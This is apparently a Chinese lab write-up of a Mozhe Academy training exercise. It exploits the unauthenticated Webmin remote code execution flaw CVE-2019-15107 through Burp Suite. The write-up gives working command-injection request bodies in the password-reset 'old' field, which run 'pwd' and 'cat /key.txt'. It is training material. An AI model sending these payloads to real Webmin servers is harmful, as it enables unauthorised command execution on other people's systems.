墨者学院—Webmin未经身份验证的远程代码执行(简单复习)

墨者学院—Webmin未经身份验证的远程代码执行(简单复习)

背景描述:

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

漏洞介绍(cve-2019-15107)

1.漏洞编号: cve-2019-15107
2.漏洞描述: 该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3.影响版本: Webmin<=1.920

靶场实操

启动靶场后,进入靶场界面,注意title为login,后面会因为这个做改动
墨者学院—Webmin未经身份验证的远程代码执行(简单复习)_第1张图片

抓包修改

打开burp suite,开启代理,点击Sign in按钮
墨者学院—Webmin未经身份验证的远程代码执行(简单复习)_第2张图片
把所抓到的数据报发送到Repeater模块,进行数据修改,发送
墨者学院—Webmin未经身份验证的远程代码执行(简单复习)_第3张图片
在这里我们能看到,页面数据显示为**/session_login.cgi**,而漏洞复现资料里是**/password_change.cgi**,所以在这里要进行修改,对提交的**user=&pass=**进行修改,利用百度漏洞资料中的poc进行模仿构造自己的语句

user=qwe&pam=1&expired=2&old=laji|pwd&new1=laji&new2=laji

响应报

在修改好所有点之后,点击go发送,查看回显数据
墨者学院—Webmin未经身份验证的远程代码执行(简单复习)_第4张图片
在这里我用的是pwd命令,回显内容为

<h3>Failed to change password : The current password is incorrect/usr/share/webmin/acl</h3>

给出了当前所在路径,说明成功执行,只需要改变命令就可以了

换命令拿key值

根据以往做墨者靶场的经验,尝试在根目录下找key.txt文件,在这里我用的是cat命令,能显示出文件中的内容

user=qwe&pam=1&expired=2&old=laji|cat /key.txt&new1=laji&new2=laji

墨者学院—Webmin未经身份验证的远程代码执行(简单复习)_第5张图片
成功拿到key值

资料

多查询资料有帮助自己积累经验,以上仅是辣鸡的我个人观点,还请多多指教。

  1. https://xz.aliyun.com/t/6040(阿里云资料)
  2. http://blog.topsec.com.cn/webmin%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%EF%BC%88cve-2019-15107%EF%BC%89%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90/(天融信)

你可能感兴趣的:(靶场)